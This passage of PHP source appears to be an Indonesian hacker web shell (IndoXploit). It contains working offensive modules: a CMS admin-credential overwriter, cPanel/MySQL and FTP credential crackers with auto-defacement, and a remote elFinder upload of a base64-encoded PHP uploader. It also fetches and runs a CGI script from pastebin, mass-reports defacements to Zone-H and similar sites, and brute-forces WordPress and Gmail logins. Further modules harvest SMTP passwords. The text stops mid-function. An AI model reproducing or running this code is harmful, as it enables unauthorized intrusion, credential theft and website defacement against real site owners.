$target = $result[alamat_website];
if($target == '') {
$target2 = $result[url];
$url_target = "Login => error, gabisa ambil nama domain nyaa
";
if($target2 == '') {
$url_target2 = "Login => error, gabisa ambil nama domain nyaa
";
} else {
$cek_login3 = file_get_contents("$target2/adminweb/");
$cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
$url_target2 = "Login => $target2/adminweb
";
} elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
$url_target2 = "Login => $target2/lokomedia/adminweb
";
} else {
$url_target2 = "Login => $target2 [ gatau admin login nya dimana :p ]
";
}
}
} else {
$cek_login = file_get_contents("$target/adminweb/");
$cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
$url_target = "Login => $target/adminweb
";
} elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
$url_target = "Login => $target/lokomedia/adminweb
";
} else {
$url_target = "Login => $target [ gatau admin login nya dimana :p ]
";
}
}
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
echo "Config => ".$file_conf."
";
echo "CMS => Lokomedia
";
if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
echo $url_target2;
} else {
echo $url_target;
}
if(!$update OR !$conn OR !$db) {
echo "Status => ".mysql_error()."
";
} else {
echo "Status => sukses edit user, silakan login dengan user & pass yang baru.
";
}
mysql_close($conn);
}
}
}
} else {
echo "
Auto Edit User Config
NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
";
}
}
/////////////////////////////////////////////
elseif($_GET['do'] == 'cpanel') {
if($_POST['crack']) {
$usercp = explode("\r\n", $_POST['user_cp']);
$passcp = explode("\r\n", $_POST['pass_cp']);
$i = 0;
foreach($usercp as $ucp) {
foreach($passcp as $pcp) {
if(@mysql_connect('localhost', $ucp, $pcp)) {
if($_SESSION[$ucp] && $_SESSION[$pcp]) {
} else {
$_SESSION[$ucp] = "1";
$_SESSION[$pcp] = "1";
if($ucp == '' || $pcp == '') {
} else {
$i++;
if(function_exists('posix_getpwuid')) {
$domain_cp = file_get_contents("/etc/named.conf");
if($domain_cp == '') {
$dom = "gabisa ambil nama domain nya";
} else {
preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
foreach($domains_cp[1] as $dj) {
$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
$user_cp_url = $user_cp_url['name'];
if($user_cp_url == $ucp) {
$dom = "$dj";
break;
}
}
}
} else {
$dom = "function is Disable by system";
}
echo "username ($ucp) password ($pcp) domain ($dom)
";
}
}
}
}
}
if($i == 0) {
} else {
echo "
sukses nyolong ".$i." Cpanel by mr Z";
}
} else {
echo "
NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
";
}}
/////////////////////////////////////////////////////
elseif($_GET['do'] == 'elfinder') {
echo '
';
# IndoXploit
function ngirim($url, $isi) {
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $isi);
curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
$data3 = curl_exec ($ch);
return $data3;
}
$target = explode("\r\n", $_POST['target']);
if($_POST['x']) {
foreach($target as $korban) {
$nama_doang = "k.php";
$isi_nama_doang = "PD9waHAgCmlmKCRfUE9TVCl7CmlmKEBjb3B5KCRfRklMRVNbImYiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyJmIl1bIm5hbWUiXSkpewplY2hvIjxiPmJlcmhhc2lsPC9iPi0tPiIuJF9GSUxFU1siZiJdWyJuYW1lIl07Cn1lbHNlewplY2hvIjxiPmdhZ2FsIjsKfQp9CmVsc2V7CgllY2hvICI8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPWY+PGlucHV0IG5hbWU9diB0eXBlPXN1Ym1pdCBpZD12IHZhbHVlPXVwPjxicj4iOwp9Cgo/Pg==";
$decode_isi = base64_decode($isi_nama_doang);
$encode = base64_encode($nama_doang);
$fp = fopen($nama_doang,"w");
fputs($fp, $decode_isi);
echo "[+] $korban
";
echo "# Upload[1] ......
";
$url_mkfile = "$korban?cmd=mkfile&name=$nama_doang&target=l1_Lw";
$b = file_get_contents("$url_mkfile");
$post1 = array(
"cmd" => "put",
"target" => "l1_$encode",
"content" => "$decode_isi",
);
$post2 = array(
"current" => "8ea8853cb93f2f9781e0bf6e857015ea",
"upload[]" => "@$nama_doang",);
$output_mkfile = ngirim("$korban", $post1);
if(preg_match("/$nama_doang/", $output_mkfile)) {
echo "# Upload Success 1... => $nama_doang
# Coba buka di ../../elfinder/files/...
";
} else {
echo "# Upload Failed 1
# Uploading 2..
";
$upload_ah = ngirim("$korban?cmd=upload", $post2);
if(preg_match("/$nama_doang/", $upload_ah)) {
echo "# Upload Success 2 => $nama_doang
# Coba buka di ../../elfinder/files/...
";
} else {
echo "# Upload Failed 2
";
echo '';
}
}
}
}
}
////////////////////////////////////////////
elseif($_GET['do'] == 'mirorsubmit') {
echo "
";
set_time_limit (0);
if (!function_exists ("curl_init")){die ("This Script uses cURL Library, you must install first !
http://au2.php.net/manual/en/curl.setup.php");}
if (@$_POST['go'])
{
foreach (explode ("\n", $_POST['domains']) as $domain)
{
post ($domain, $_POST['defacer'], $_POST['mirror']);
}
echo "
Zone-h
";
echo "Dark-h
";
echo "Aljyyosh.org";
}
function post ($url, $defacer, $mirror)
{
$ch = curl_init ();
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_POST, 1);
switch ($mirror)
{
case "zone-h";
curl_setopt ($ch, CURLOPT_URL, "http://www.zone-h.com/notify/single");
curl_setopt ($ch, CURLOPT_POSTFIELDS, "defacer=$defacer&domain1=$url&hackmode=1&reason=1");
if (preg_match ("/color=\"red\">OK<\/font><\/li>/", curl_exec ($ch)))
echo "$url.      OK
";
else
echo "$url      Error
";
break;
case "dark-h";
curl_setopt ($ch, CURLOPT_URL, "http://dark-h.org/notify/kaydet.php");
curl_setopt ($ch, CURLOPT_POSTFIELDS, "hacker=$defacer&site=$url&gkodumuz=123456&zgkod=123456&kod=123456");
curl_exec ($ch);
echo "$url
";
break;
case "aljyyosh.org";
curl_setopt ($ch, CURLOPT_URL, "http://aljyyosh.org/single.php");
curl_setopt ($ch, CURLOPT_COOKIE, "alj=aljyyosh");
curl_setopt ($ch, CURLOPT_POSTFIELDS, "hacker=$defacer&site=$url&how=1&why=1&addsite=Send");
if (preg_match ("/ OK<\/font>/", curl_exec ($ch)))
echo "$url      OK
";
else
echo "$url      Error
";
break;
default:
break;
}
curl_close ($ch);
}
}
///////////////////////////////////////////
elseif($_GET['do'] == 'zoneh') {
if($_POST['submit']) {
$domain = explode("\r\n", $_POST['url']);
$nick = $_POST['nick'];
echo "Defacer Onhold: http://www.zone-h.org/archive/notifier=$nick/published=0
";
echo "Defacer Archive: http://www.zone-h.org/archive/notifier=$nick
";
function zoneh($url,$nick) {
$ch = curl_init("http://www.zone-h.com/notify/single");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
return curl_exec($ch);
curl_close($ch);
}
foreach($domain as $url) {
$zoneh = zoneh($url,$nick);
if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
echo "$url -> OK
";
} else {
echo "$url -> ERROR
";
}
}
} else {
echo "";
}
echo "";
}
///////////////////////////////
elseif($_GET['do'] == 'defid') {
echo '';
echo '
';
echo 'Defacer.ID Auto Submit!';
echo '
';
echo '';
echo '';
$site = explode("\r\n", $_POST['sites']);
$go = $_POST['go'];
$hekel = $_POST['hekel'];
$crew = $_POST['crew'];
if($go) {
foreach($site as $sites) {
$zh = $sites;
$form_url = "https://defacer.id/notify";
$data_to_post = array();
$data_to_post['attacker'] = "$hekel";
$data_to_post['team'] = "$crew";
$data_to_post['poc'] = 'SQL Injection';
$data_to_post['url'] = "$zh";
$curl = curl_init();
curl_setopt($curl,CURLOPT_URL, $form_url);
curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
$result = curl_exec($curl);
echo $result;
curl_close($curl);
echo "
";
}
}
}
///////////////////////////////
elseif($_GET['do'] == 'cpftp_auto') {
if($_POST['crack']) {
$usercp = explode("\r\n", $_POST['user_cp']);
$passcp = explode("\r\n", $_POST['pass_cp']);
$i = 0;
foreach($usercp as $ucp) {
foreach($passcp as $pcp) {
if(@mysql_connect('localhost', $ucp, $pcp)) {
if($_SESSION[$ucp] && $_SESSION[$pcp]) {
} else {
$_SESSION[$ucp] = "1";
$_SESSION[$pcp] = "1";
if($ucp == '' || $pcp == '') {
//
} else {
echo "[+] username ($ucp) password ($pcp)
";
$ftp_conn = ftp_connect(gethostbyname($_SERVER['HTTP_HOST']));
$ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
if((!$ftp_login) || (!$ftp_conn)) {
echo "[+] Login Gagal
";
} else {
echo "[+] Login Sukses
";
$fi = htmlspecialchars($_POST['file_deface']);
$deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
if($deface) {
$i++;
echo "[+] Deface Sukses
";
if(function_exists('posix_getpwuid')) {
$domain_cp = file_get_contents("/etc/named.conf");
if($domain_cp == '') {
echo "[+] gabisa ambil nama domain nya
";
} else {
preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
foreach($domains_cp[1] as $dj) {
$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
$user_cp_url = $user_cp_url['name'];
if($user_cp_url == $ucp) {
echo "[+] http://$dj/$fi
";
break;
}
}
}
} else {
echo "[+] gabisa ambil nama domain nya
";
}
} else {
echo "[-] Deface Gagal
";
}
}
//echo "username ($ucp) password ($pcp)
";
}
}
}
}
}
if($i == 0) {
} else {
echo "
sukses deface ".$i." Cpanel by IndoXploit.";
}
} else {
echo "
NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
";
}
}
///////////////////////////////
elseif($_GET['do'] == 'cgi') {
$cgi_dir = mkdir('ctt_cgi', 0755);
$file_cgi = "ctt_cgi/cgi.izo";
$isi_htcgi = "AddHandler cgi-script .izo";
$htcgi = fopen(".htaccess", "w");
$cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
$cgi = fopen($file_cgi, "w");
fwrite($cgi, $cgi_script);
fwrite($htcgi, $isi_htcgi);
chmod($file_cgi, 0755);
echo "";
} elseif($_GET['do'] == 'fake_root') {
ob_start();
function reverse($url) {
$ch = curl_init("http://domains.yougetsignal.com/domains.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_POST, 1);
$resp = curl_exec($ch);
$resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
$array = explode(",,", $resp);
unset($array[0]);
foreach($array as $lnk) {
$lnk = "http://$lnk";
$lnk = str_replace(",", "", $lnk);
echo $lnk."\n";
ob_flush();
flush();
}
curl_close($ch);
}
function cek($url) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$resp = curl_exec($ch);
return $resp;
}
$cwd = getcwd();
$ambil_user = explode("/", $cwd);
$user = $ambil_user[2];
if($_POST['reverse']) {
$site = explode("\r\n", $_POST['url']);
$file = $_POST['file'];
foreach($site as $url) {
$cek = cek("$url/~$user/$file");
if(preg_match("/hacked/i", $cek)) {
echo "URL: $url/~$user/$file -> Fake Root!
";
}
}
} else {
echo "
NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.";
}
}
elseif($_GET['do'] == 'wpbf') {
echo '
# Wordpress Mass brute Force #
Wordpress Mass brute Force
';
@set_time_limit(0);
if($_POST['x']){
echo "
";
$sites = explode("\n",$_POST["sites"]); // Get Sites By Th3 K!LL3r Dz !
$w0rds = explode("\n",$_POST["w0rds"]); // Get w0rdLiSt By Th3 K!LL3r Dz !
$Attack = new Wordpress_brute_Force(); // Active Class
foreach($w0rds as $pwd){
foreach($sites as $site){
$Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd)); // Brute :D
flush();flush();
}
}
}
# Class & Function'z
function txt_cln($value){ return str_replace(array("\n","\r"),"",$value); }
class Wordpress_brute_Force{
public function check_it($site,$user,$pass){ // print result
if(eregi('profile.php',$this->post($site,$user,$pass))){
echo "# Success : $user:$pass -> $site/wp-admin/
";
$f = fopen("Wp-Result.txt","a+"); fwrite($f , "Success ~~ $user:$pass -> $site/wp-admin/\n"); fclose($f);
flush();
}else{ echo "# Failed : $user:$pass -> $site
"; flush();}
}
public function post($site,$user,$pass){ // Post -> user & pass
$login =$site.'/wp-login.php';
$to = $site.'/wp-admin';
$token = $this->extract_token($site);
$log = array ('Log In','دخول');
$data = array ('log'=>$user,'pwd'=>$pass,'rememberme'=>'forever','wp-submit'=>$log,'redirect_to'=>$to,'testcookie'=>1);
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$login);
@curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
@curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
@curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,$data);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
public function extract_token($site){ // get token from source for -> function post
$source = $this->get_source($site);
preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" ,$source,$token);
return $token[1][0];
}
public function get_source($site){ // get source for -> function extract_token
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$login);
@curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
@curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
@curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
} }
/////////////////////////
elseif($_GET['do'] == 'smtp') {
echo "NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
";
function scj($dir) {
$dira = scandir($dir);
foreach($dira as $dirb) {
if(!is_file("$dir/$dirb")) continue;
$ambil = file_get_contents("$dir/$dirb");
$ambil = str_replace("$", "", $ambil);
if(preg_match("/JConfig|joomla/", $ambil)) {
$smtp_host = ambilkata($ambil,"smtphost = '","'");
$smtp_auth = ambilkata($ambil,"smtpauth = '","'");
$smtp_user = ambilkata($ambil,"smtpuser = '","'");
$smtp_pass = ambilkata($ambil,"smtppass = '","'");
$smtp_port = ambilkata($ambil,"smtpport = '","'");
$smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
echo "SMTP Host: $smtp_host
";
echo "SMTP port: $smtp_port
";
echo "SMTP user: $smtp_user
";
echo "SMTP pass: $smtp_pass
";
echo "SMTP auth: $smtp_auth
";
echo "SMTP secure: $smtp_secure
";
}
}
}
$smpt_hunter = scj($dir);
echo $smpt_hunter;
}
/////////////////////////
elseif($_GET['do'] == 'whmcs') {
$dic ="list.txt";
echo "
Gmail Brute Force Attacker
|
sebelum gunain tools ini upload dulu file list.txt ente
";
// Sets variables and retrives google error for comparing
if(isset($_POST['attack']) && isset($_POST['username'])) {
$username = $_POST['username'];
$headers = array(
"Host: mail.google.com",
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4",
"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
"Accept-Language: en-us,en;q=0.5",
"Accept-Encoding: text", # No gzip, it only clutters your code!
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Date: ".date(DATE_RFC822)
);
$c = curl_init('https://mail.google.com/mail/feed/atom');
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
$wrong = curl_exec($c); // Get it
curl_close($c); // Close the curl stream
}
//Dictionary Attack
if($_POST['attack'] == "dictionary") {
$Dictionary = file("$dic");
for ($Position = 0; $Position < count($Dictionary); $Position++) {
$Dictionary[$Position] = str_replace("rn", "", $Dictionary[$Position]);
if(check_correct($username, $Dictionary[$Position])) {
die("
Found the password of: ".$Dictionary[$Position]." For the account: ".$username."
|
");
}
}
echo "
Sorry... a password was not found for the account of ".$username." during the dictionar
y attack.
|
";
}
//Brute Attack
elseif($_POST['attack'] == "brute") {
for ($Pass = 0; $Pass < 2; $Pass++) {
if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; }
if(check_correct($username, $Pass)) {
die("
Found the password of: ".$Dictionary[$Position]." For the account: ".$username."
|